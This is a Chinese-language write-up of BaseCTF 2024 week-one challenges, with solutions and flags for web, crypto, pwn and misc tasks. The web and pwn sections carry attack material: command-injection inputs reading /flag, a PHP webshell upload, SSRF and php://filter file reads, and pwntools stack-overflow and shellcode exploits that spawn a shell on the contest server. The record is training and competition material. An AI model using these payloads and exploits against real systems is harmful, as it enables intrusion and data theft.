2024BaseCTF-week1wp
web
HTTP 是什么呀
根据提示写出相应的数据
跳转了网页,但没有flag,BP抓哥包
出现了base64的编码
解码
喵喵喵´•ﻌ•`
命令执行
?DT=system('ls /');
看到有flag
直接读取flag
?DT=system('cat /flag');
BaseCTF{8eb2a1c2-7de7-437b-bc16-fc3d783b797c}
md5绕过欸
数组烧过
构造
GET: ?name[]=1&name2[]=1
Post: password[]=2&password2[]=2
BaseCTF{7303a874-de8f-4423-86b6-3a1e7b84816a}
A Dark Room
右键查看源代码
BaseCTF{847ff058-c19d-4157-ad42-e9740823d7fe}
upload
上传一个php一句话木马文件,用蚁剑连接
BaseCTF{f726fc86-5dbf-4781-9179-bcf635bb2a4b}
Aura 酱的礼物
题目提示php伪协议和ssrf
构造伪协议
pen=data://plain/text,Aura
POST: challenge=http://jasmineaura.github.io
[+] 检测目标字符串是否在 challenge 的开头,按要求传入即可
POST: challenge=http://jasmineaura.github.io@127.0.0.1
[+] 第二层限制我们 challenge 的开头只能是 http://jasmineaura.github.io,不过 file_get_contents 可以用于发起 HTTP 请求,获取远程资源的内容。
[+] 如何让页面内容包含指定的字符串呢?这里需要用到@。@ 是虚拟域名, 在浏览器输入后, 浏览器会识别@后面的域名, 前面则是域名的配置信息。
[+] 在 challenge 尾部加上 @127.0.0.1,这样 file_get_contents 获取的内容就是当前页面的内容,正好包含了目标字符串。
最后提示到 flag 在 flag.php 中,使用 php://filter 伪协议读出 flag 即可。
POST: gift=php://filter/read=convert.base64-encode/resource=flag.php
POST: pen=data://plain/text,Aura&challenge=http://jasmineaura.github.io@127.0.0.1&gift=php://filter/read=convert.base64-encode/resource=flag.php
出来base64编码
BaseCTF{a504b0d6-15c5-4f2a-acef-ca363c4b6d05}
Crypto
helloCrypto
from Crypto.Util.number import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
import random
flag=b'BaseCTF{}'
key=random.randbytes(16)
print(bytes_to_long(key))
my_aes=AES.new(key=key,mode=AES.MODE_ECB)
print(my_aes.encrypt(pad(flag,AES.block_size)))
# key1 = 208797759953288399620324890930572736628
# c = b'U\xcd\xf3\xb1 r\xa1\x8e\x88\x92Sf\x8a`Sk],\xa3(i\xcd\x11\xd0D\x1edd\x16[&\x92@^\xfc\xa9(\xee\xfd\xfb\x07\x7f:\x9b\x88\xfe{\xae'
AES加密
from Crypto.Util.number import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
key = 208797759953288399620324890930572736628
key = long_to_bytes(key)
flag = b'U\xcd\xf3\xb1 r\xa1\x8e\x88\x92Sf\x8a`Sk],\xa3(i\xcd\x11\xd0D\x1edd\x16[&\x92@^\xfc\xa9(\xee\xfd\xfb\x07\x7f:\x9b\x88\xfe{\xae'
my_aes=AES.new(key=key,mode=AES.MODE_ECB)
print(my_aes.decrypt(pad(flag,AES.block_size)))
#b'BaseCTF{b80bf679-1869-4fde-b3f9-d51b872d31fb}\x03\x03\x03\xcd\xc6\xd1d\xb2\xe8\xe6\xca\x12sJ\xaf\xa7<\x9f\xd0'
BaseCTF{b80bf679-1869-4fde-b3f9-d51b872d31fb}
你会算 md5 吗
import hashlib
flag='BaseCTF{}'
output=[]
for i in flag:
my_md5=hashlib.md5()
my_md5.update(i.encode())
output.append(my_md5.hexdigest())
print("output =",output)
'''
output = ['9d5ed678fe57bcca610140957afab571', '0cc175b9c0f1b6a831c399e269772661', '03c7c0ace395d80182db07ae2c30f034', 'e1671797c52e15f763380b45e841ec32', '0d61f8370cad1d412f80b84d143e1257', 'b9ece18c950afbfa6b0fdbfa4ff731d3', '800618943025315f869e4e1f09471012', 'f95b70fdc3088560732a5ac135644506', '0cc175b9c0f1b6a831c399e269772661', 'a87ff679a2f3e71d9181a67b7542122c', '92eb5ffee6ae2fec3ad71c777531578f', '8fa14cdd754f91cc6554c9e71929cce7', 'a87ff679a2f3e71d9181a67b7542122c', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '0cc175b9c0f1b6a831c399e269772661', 'e4da3b7fbbce2345d7772b0674a318d5', '336d5ebc5436534e61d16e63ddfca327', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '8fa14cdd754f91cc6554c9e71929cce7', '8fa14cdd754f91cc6554c9e71929cce7', '45c48cce2e2d7fbdea1afc51c7c6ad26', '336d5ebc5436534e61d16e63ddfca327', 'a87ff679a2f3e71d9181a67b7542122c', '8f14e45fceea167a5a36dedd4bea2543', '1679091c5a880faf6fb5e6087eb1b2dc', 'a87ff679a2f3e71d9181a67b7542122c', '336d5ebc5436534e61d16e63ddfca327', '92eb5ffee6ae2fec3ad71c777531578f', '8277e0910d750195b448797616e091ad', '0cc175b9c0f1b6a831c399e269772661', 'c81e728d9d4c2f636f067f89cc14862c', '336d5ebc5436534e61d16e63ddfca327', '0cc175b9c0f1b6a831c399e269772661', '8fa14cdd754f91cc6554c9e71929cce7', 'c9f0f895fb98ab9159f51fd0297e236d', 'e1671797c52e15f763380b45e841ec32', 'e1671797c52e15f763380b45e841ec32', 'a87ff679a2f3e71d9181a67b7542122c', '8277e0910d750195b448797616e091ad', '92eb5ffee6ae2fec3ad71c777531578f', '45c48cce2e2d7fbdea1afc51c7c6ad26', '0cc175b9c0f1b6a831c399e269772661', 'c9f0f895fb98ab9159f51fd0297e236d', '0cc175b9c0f1b6a831c399e269772661', 'cbb184dd8e05c9709e5dcaedaa0495cf']
'''
flag 中的每个字符都进行了 md5 加密,那么只需要逐个爆破每个字符,与目标 md5 值比较即可。
import hashlib
output = ['9d5ed678fe57bcca610140957afab571', '0cc175b9c0f1b6a831c399e269772661', '03c7c0ace395d80182db07ae2c30f034', 'e1671797c52e15f763380b45e841ec32', '0d61f8370cad1d412f80b84d143e1257', 'b9ece18c950afbfa6b0fdbfa4ff731d3', '800618943025315f869e4e1f09471012', 'f95b70fdc3088560732a5ac135644506', '0cc175b9c0f1b6a831c399e269772661', 'a87ff679a2f3e71d9181a67b7542122c', '92eb5ffee6ae2fec3ad71c777531578f', '8fa14cdd754f91cc6554c9e71929cce7', 'a87ff679a2f3e71d9181a67b7542122c', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '0cc175b9c0f1b6a831c399e269772661', 'e4da3b7fbbce2345d7772b0674a318d5', '336d5ebc5436534e61d16e63ddfca327', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '8fa14cdd754f91cc6554c9e71929cce7', '8fa14cdd754f91cc6554c9e71929cce7', '45c48cce2e2d7fbdea1afc51c7c6ad26', '336d5ebc5436534e61d16e63ddfca327', 'a87ff679a2f3e71d9181a67b7542122c', '8f14e45fceea167a5a36dedd4bea2543', '1679091c5a880faf6fb5e6087eb1b2dc', 'a87ff679a2f3e71d9181a67b7542122c', '336d5ebc5436534e61d16e63ddfca327', '92eb5ffee6ae2fec3ad71c777531578f', '8277e0910d750195b448797616e091ad', '0cc175b9c0f1b6a831c399e269772661', 'c81e728d9d4c2f636f067f89cc14862c', '336d5ebc5436534e61d16e63ddfca327', '0cc175b9c0f1b6a831c399e269772661', '8fa14cdd754f91cc6554c9e71929cce7', 'c9f0f895fb98ab9159f51fd0297e236d', 'e1671797c52e15f763380b45e841ec32', 'e1671797c52e15f763380b45e841ec32', 'a87ff679a2f3e71d9181a67b7542122c', '8277e0910d750195b448797616e091ad', '92eb5ffee6ae2fec3ad71c777531578f', '45c48cce2e2d7fbdea1afc51c7c6ad26', '0cc175b9c0f1b6a831c399e269772661', 'c9f0f895fb98ab9159f51fd0297e236d', '0cc175b9c0f1b6a831c399e269772661', 'cbb184dd8e05c9709e5dcaedaa0495cf']
flag = ""
for i in output:
for c in range(1,127):
c = chr(c)
my_md5 = hashlib.md5()
my_md5.update(c.encode())
if(my_md5.hexdigest()==i):
flag += c
print(flag)
#BaseCTF{a4bf43a5-3ff9-4764-bda2-af8ee4db9a8a}
BaseCTF{a4bf43a5-3ff9-4764-bda2-af8ee4db9a8a}
ez_rsa
from Crypto.Util.number import *
import gmpy2
m=bytes_to_long(b'BaseCTF{th1s_is_fake_fl4g}')
e=65537
p=getPrime(512)
q=getPrime(512)
n=p*q
not_phi=(p+2)*(q+2)
c=pow(m,e,n)
print(n)
print(not_phi)
print(c)
'''
96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790344897976690691139671461342896437428086142262969360560293350630096355947291129943172939923835317907954465556018515239228081131167407674558849860647237317421
96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790384900615665394180812810697286554008262030049280213663390855887077502992804805794388166197820395507600028816810471093163466639673142482751115353389655533205
37077223015399348092851894372646658604740267343644217689655405286963638119001805842457783136228509659145024536105346167019011411567936952592106648947994192469223516127472421779354488529147931251709280386948262922098480060585438392212246591935850115718989480740299246709231437138646467532794139869741318202945
'''
import libnum
e=65537
n = 96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790344897976690691139671461342896437428086142262969360560293350630096355947291129943172939923835317907954465556018515239228081131167407674558849860647237317421
not_phi = 96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790384900615665394180812810697286554008262030049280213663390855887077502992804805794388166197820395507600028816810471093163466639673142482751115353389655533205
c = 37077223015399348092851894372646658604740267343644217689655405286963638119001805842457783136228509659145024536105346167019011411567936952592106648947994192469223516127472421779354488529147931251709280386948262922098480060585438392212246591935850115718989480740299246709231437138646467532794139869741318202945
phi = n-(not_phi-n-4)//2+1
d = libnum.invmod(e,phi)
m = pow(c,d,n)
print(libnum.n2s(m))
#BaseCTF{it_1s_ez!!}
十七倍
#include <stdio.h>
int main() {
unsigned char flag[] = "BaseCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}";
/**
* �� (unsigned) char ������ÿ��Ԫ�����ڴ���ռ 1 �ֽڣ��� 8 λ��8 �� 0 �� 1��
* ���ڴ��У����ַ�������������ڡ���ĸ�������ǵڼ����ַ�
* ���磺
* B �� 66 ���ڴ��д���� 01000010
* a �� 97 ���ڴ��д���� 01100001
* s �� 115 ���ڴ��д���� 01110011
* e �� 101 ���ڴ��д���� 01100101
*/
int i;
for (i = 0; i < 40; i++) {
flag[i] = flag[i] * 17;
}
if (flag[0] != 98) { /* �±��Ǵ� 0 ��ʼ�� */
printf("CPU Error???\n");
return 1;
}
/**
* 66 * 17 = 1122
* ������ڴ��б��� 1122������ 00000100 01100010
* ���� unsigned char ������ֻ�ܴ� 8 λ��CPU Ӳ�����Զ�ȡ�� 8 λ���� 01100010
* 01100010 �� 98������ 66 * 17 = 98
*
* ע� 8 �� 0 �� 1 �� 256 �ֿ��ܣ��� 0~255
* ��ȡ�� 8 λ��ȡģ��ȡ������256
* �������֤��1122 ���� 256 ��Ϊ 4 ����Ϊ 98
*/
unsigned char cipher[] = {
98, 113, 163, 181, 115, 148, 166, 43, 9, 95,
165, 146, 79, 115, 146, 233, 112, 180, 48, 79,
65, 181, 113, 146, 46, 249, 78, 183, 79, 133,
180, 113, 146, 148, 163, 79, 78, 48, 231, 77
};
for (i = 0; i < 40; i++) {
if (flag[i] != cipher[i]) {
printf("flag[%d] is wrong, expect %d, got %d.\n", i, cipher[i], flag[i]);
return 1;
}
}
/**
* ��� flag ����ȷ�ģ�������õ���������ݡ�
* �����ʵ�������㣬flag[i] * 17 = cipher[i]����ô flag[i] = cipher[i] / 17
* ģ�� 256 ��������ô���أ�ѧһ�¡�ģ����˷���Ԫ���ɡ�
*/
return 0;
}
每个字符乘了个17
#include<bits/stdc++.h>
using namespace std;
int main()
{
unsigned char cipher[] = {
98, 113, 163, 181, 115, 148, 166, 43, 9, 95,
165, 146, 79, 115, 146, 233, 112, 180, 48, 79,
65, 181, 113, 146, 46, 249, 78, 183, 79, 133,
180, 113, 146, 148, 163, 79, 78, 48, 231, 77
};
for(int i=0;i<40;i++)
{
for(int c=0;c<127;c++)
{
unsigned char temp=c*17;
if(temp==cipher[i])
{
printf("%c",c);
break;
}
}
}
return 0;
}
//BaseCTF{yoUr_CrYpt0_1earNinG_5tarTs_n0w}
BaseCTF{yoUr_CrYpt0_1earNinG_5tarTs_n0w}
babypack
from Crypto.Util.number import *
import random
flag=b'BaseCTF{}'
m=bytes_to_long(flag)
bin_m=bin(m)[2:]
length=len(bin_m)
a=[1]
sum=1
for i in range(length-1):
temp=random.randint(2*sum+1,4*sum)
sum=sum+temp
a.append(temp)
a=a[::-1]
c=0
for i in range(length):
if bin_m[i]=='1':
c=c+a[i]
print("a=",a)
print("c=",c)
队友喂给 GPT 直接给跑出来了,要到代码以后想了想,其实就是一个贪心,从 a 中最大的开始,如果与当前累加和相加不超过 c,那么这一位就是 1,反之为 0。
from Crypto.Util.number import long_to_bytes
a= [2487264674516612702148381262059366937897201508455413114345031288894980789076145147579418259432661232747375904997965581530362268904008339124626472045717075482791021095030019783589425299870946373246221582957232862473515,...3, 1]
c= 2488656295807929935404316556194747314175977860755594014838879551525915558042003735363919054632036359039039831854134957725034750353847782168033537523854288427613513938991943920607437000388885418821419115067060003426834
recovered_bin = ''
current_sum = 0
for value in a:
if current_sum + value <= c:
recovered_bin += '1'
current_sum += value
else:
recovered_bin += '0'
recovered_m = int(recovered_bin, 2)
recovered_flag = long_to_bytes(recovered_m)
print("Recovered Flag:", recovered_flag)
#b'BaseCTF{2c4b0c15-3bee-4e4a-be6e-0f21e44bd4c9}'
BaseCTF{2c4b0c15-3bee-4e4a-be6e-0f21e44bd4c9}
babyrsa
from Crypto.Util.number import *
flag=b'BaseCTF{}'
m=bytes_to_long(flag)
n=getPrime(1024)
e=65537
c=pow(m,e,n)
print("n =",n)
print("e =",e)
print("c =",c)
"""
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832
"""
n 是素数
import libnum
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832
phi = n-1
d = libnum.invmod(e,phi)
m = pow(c,d,n)
print(libnum.n2s(m))
#BaseCTF{7d7c90ae-1127-4170-9e0d-d796efcd305b}
BaseCTF{7d7c90ae-1127-4170-9e0d-d796efcd305b}
ez_math
import numpy as np
from Crypto.Util.number import *
a, b, c, d = [getPrime(128) for _ in range(4)]
point1 = a * d
point2 = b * c
matrix2 = [[0, a, b], [0, c, d]]
flag = b"flag{test_flag}"
flag = bytes_to_long(flag)
def randomArray():
upper = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]
low = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]
for i in range(3):
for j in range(i+1, 3):
upper[i][j] = getPrime(128)
low[j][i] = getPrime(128)
result = np.array(upper) @ np.array(low)
return result
A = np.array([[flag, 0, 0]] + matrix2)
B = randomArray()
MAT = A @ B
print(point1)
print(point2)
print(MAT)
'''
85763755029292607594055805804755756282473763031524911851356658672180185707477
70470862191594893036733540494554536608294230603070251013536189798304544579643
[[73595299897883318809385485549070133693240974831930302408429664709375267345973630251242462442287906226820558620868020093702204534513147710406187365838820773200509683489479230005270823245
46106113894293637419638880781044700751458754728940339402825975283562443072980134956975133603010158365617690455079648357103963721564427583836974868790823082218575195867647267322046726830
161159443444728507357705839523372181165265338895748546250868368998015829266587881868060439602487400399254839839711192069105943123376622497847079185]
[13874395612510317401724273626815493897470313869776776437748145979913315379889260408106588331541371806148807844847909
17025249852164087827929313934411832021160463738288565876371918871371314930048841650464137478757581505369909723030523
59510107422473463833740668736202898422777415868238817665123293560097821015330]
[11314088133820151155755028207579196628679021106024798818326096960197933616112389017957501267749946871903275867785729
13883500421020573457778249958402264688539607625195400103961001780695107955462968883861677871644577542226749179056659
48528427402189936709203219516777784993195743269405968907408051071264464132448]]
'''
import libnum
r1 = 5
r2 = 47
r3 = 165910487036337353
r4 = 2030077153967
r5 = 15843025159117910236953662147
r6 = 264640112777955589596964625962416083749
r7 = 485632484872444690113355773590051952254669552507
flag = r1*r2*r3*r4*r5*r7
print(libnum.n2s(flag))
#b'BaseCTF{7E9328AF-784C-8AF5-AC10-D6A8FC0977A8}'
BaseCTF{7E9328AF-784C-8AF5-AC10-D6A8FC0977A8}
pwn
我把她丢了
64位。
存在栈溢出。
有 system。
有 /bin/sh,鉴定为模板题。
from pwn import*
host = remote("challenge.basectf.fun",34817)
sh = 0x402008
sys = 0x401080
rdi = 0x401196
ret = 0x40101a
payload = b'A'*112 + b'B'*8 + p64(rdi) + p64(sh) + p64(ret) + p64(sys)
host.sendline(payload)
host.interactive()
BaseCTF{4d20db6c-73b4-41a0-84b4-b55c578089ba}
Ret2text
64位。
存在栈溢出。
有后门函数,鉴定为基础模板,注意这是 64 位的,需要处理堆栈平衡。
from pwn import*
host = remote("challenge.basectf.fun",32679)
cnt = 32
ex = 0x4011D1
addr = 0x4011A4
payload = b'A'*cnt + b'B'*8 + p64(ex) + p64(addr)
host.sendline(payload)
host.interactive()
BaseCTF{590197ff-2fc9-4583-b613-9792b5be7cdb}
shellcode_level0
64位。
exp
from pwn import *
context.arch = "amd64"
host = remote("challenge.basectf.fun",49063)
payload=asm(shellcraft.sh())
host.sendline(payload)
host.interactive()
BaseCTF{f37dea73-58c3-4e2d-8ec3-cd5fc771e1e5}
签个到吧
nc challenge.basectf.fun 22036
BaseCTF{cc3c3e64-84f7-42e0-a3b7-09f8d928b7af}
echo
BaseCTF{dd0c34db-70be-4a1d-9a19-50f480bb81a1}
misc
你也喜欢圣物吗
lsb隐写
得到key
lud1_lud1
解压,伪加密修复
BaseCTF{1u0_q1_x1_51k1}
根本进不去啊!
在线网站解
BaseCTF{h0h0_th1s_15_dns_rec0rd}
海上遇到了鲨鱼
就导出这个文件
}67bf613763ca-50b3-4437-7a3a-b683fe51{FTCesaB
https://www.qqxiuzi.cn/zh/daoxu/去这个网站反转文字
BaseCTF{15ef386b-a3a7-7344-3b05-ac367316fb76}
正着看还是反着看呢?
jpg文件
with open("flag", 'rb') as f:
with open("output.jpg", 'wb') as g:
g.write(f.read()[::-1])
用脚本翻转一下
章若楠
分离一下
BaseCTF{h3ll0_h4cker}
Base
赛博厨子嗦了
BaseCTF{we1c0me_to_b4sectf}
人生苦短,我用Python
猜谜题目
BaseCTF{s1Mpl3_1s_BeTt3r_Th4n_C0mPl3x}
长度检查: len(flag) != 38
我们的flag必须是38个字符长。
前缀检查: flag.startswith('BaseCTF{')
flag必须以BaseCTF{开头。
特定字符检查: flag.find('Mp') != 10
flag的第10和第11个字符应该是Mp。
后缀检查: flag[-3:] * 8 != '3x}3x}3x}3x}3x}3x}3x}3x}'
flag的倒数第三个字符到结尾应该是3x}。
结尾字符检查: ord(flag[-1]) != 125
flag的最后一个字符必须是},因为125是}的ASCII码。
下划线检查: flag.count('_') // 2 != 2
flag中应该有4个下划线,因为4 // 2 == 2。
分割检查: list(map(len, flag.split('_'))) != [14, 2, 6, 4, 8]
flag在以_分割后,分割出的部分长度应该分别为14, 2, 6, 4, 8。
特定位置检查: flag[12:32:4] != 'lsT_n'
flag在第12到32个字符中,每隔4个字符应该是lsT_n。
大写字符检查: flag[:9]转为大写并用